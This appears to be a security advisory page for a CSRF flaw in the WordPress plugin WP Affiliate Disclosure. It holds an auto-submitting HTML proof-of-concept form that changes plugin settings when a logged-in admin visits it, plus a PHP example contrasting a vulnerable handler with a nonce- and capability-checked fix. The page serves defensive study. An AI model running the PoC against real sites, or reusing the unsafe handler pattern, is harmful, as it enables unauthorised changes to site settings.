Vulnerability in mojofywp WP Affiliate Disclosure (wp-affiliate-disclosure). This issue affects WP Affiliate Disclosure: from n/a through 1.2.6.
CVSS Details
CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Configurations (Affected Products)
WP Affiliate Disclosure <= 1.2.6
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2023-47232 -->
<!-- WordPress WP Affiliate Disclosure Plugin CSRF Exploit -->
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC - CVE-2023-47232</title>
</head>
<body>
<h1>CVE-2023-47232 CSRF PoC</h1>
<p>This PoC demonstrates the CSRF vulnerability in WP Affiliate Disclosure plugin.</p>
<!-- Auto-submit form for CSRF attack -->
<form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST">
<!-- Plugin's action endpoint (example) -->
<input type="hidden" name="action" value="save_affiliate_disclosure">
<input type="hidden" name="nonce" value="">
<input type="hidden" name="disclosure_text" value="Malicious modified disclosure content">
<input type="hidden" name="settings_updated" value="1">
</form>
<script>
// Auto-submit after page load
document.getElementById('csrfForm').submit();
</script>
<p>If you see this message, the form was not auto-submitted.</p>
<button onclick="document.getElementById('csrfForm').submit()">Submit Attack</button>
</body>
</html>
<!-- Notes:
1. Replace 'target-site' with the actual WordPress site URL
2. The nonce field may be missing or improperly validated
3. This PoC is for educational and authorized testing purposes only
4. Requires target admin to be logged in and visit this page
-->
```
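The PoC above works only when the handler behind `admin-post.php` accepts a settings change without a valid nonce and capability check. The following is an added example, not the plugin's own code, showing the vulnerable handler shape next to the hardened one that WordPress's own API provides. Every identifier in it is hypothetical: the action hook `admin_post_example_save_disclosure`, the option `example_affiliate_disclosure`, the nonce name `example_nonce` and the settings page slug are assumptions, not names taken from WP Affiliate Disclosure.

```php
<?php
// Added example (not the plugin's code). All hook, option and field names below are
// hypothetical placeholders chosen for illustration.

// Vulnerable shape: the handler trusts any POST that reaches it. Because the browser
// attaches the admin's session cookie to a cross-site form submission, a page like the
// PoC above can drive this handler while the admin is logged in.
function example_save_disclosure_unsafe() {
    update_option( 'example_affiliate_disclosure', wp_unslash( $_POST['disclosure_text'] ) );
    wp_safe_redirect( admin_url( 'options-general.php?page=example-disclosure' ) );
    exit;
}

// Hardened shape: capability check, nonce check, then sanitised storage.
function example_save_disclosure() {
    // 1. Only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to do this.', 'example' ), 403 );
    }

    // 2. The nonce binds the request to a form this user rendered recently.
    //    check_admin_referer() verifies $_POST['example_nonce'] against the
    //    'example_save_disclosure' action and calls wp_die() on failure, so an
    //    empty or forged nonce (as in the PoC) never reaches the save below.
    check_admin_referer( 'example_save_disclosure', 'example_nonce' );

    // 3. Sanitise before storing; wp_kses_post() keeps only post-safe HTML.
    $text = isset( $_POST['disclosure_text'] )
        ? wp_kses_post( wp_unslash( $_POST['disclosure_text'] ) )
        : '';
    update_option( 'example_affiliate_disclosure', $text );

    wp_safe_redirect( add_query_arg(
        'settings-updated',
        '1',
        admin_url( 'options-general.php?page=example-disclosure' )
    ) );
    exit;
}
add_action( 'admin_post_example_save_disclosure', 'example_save_disclosure' );

// The matching settings form. wp_nonce_field() emits the hidden input that
// check_admin_referer() later verifies; a cross-site page cannot read this value.
function example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_save_disclosure">
        <?php wp_nonce_field( 'example_save_disclosure', 'example_nonce' ); ?>
        <textarea name="disclosure_text"><?php
            echo esc_textarea( get_option( 'example_affiliate_disclosure', '' ) );
        ?></textarea>
        <?php submit_button(); ?>
    </form>
    <?php
}
```

The nonce is what defeats the PoC: `wp_nonce_field()` derives it from the action name, the current user ID, the session token and a time window, so the attacker's page has no way to fill in the empty `nonce` input with a value `check_admin_referer()` will accept. The capability check is a separate control and stays in place even when the nonce is valid, since a nonce only proves intent, not authorisation.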